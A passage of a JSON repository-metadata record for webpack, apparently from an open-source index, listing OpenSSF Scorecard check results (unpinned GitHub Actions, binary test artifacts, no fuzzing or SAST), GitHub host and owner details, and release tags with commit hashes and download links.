test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"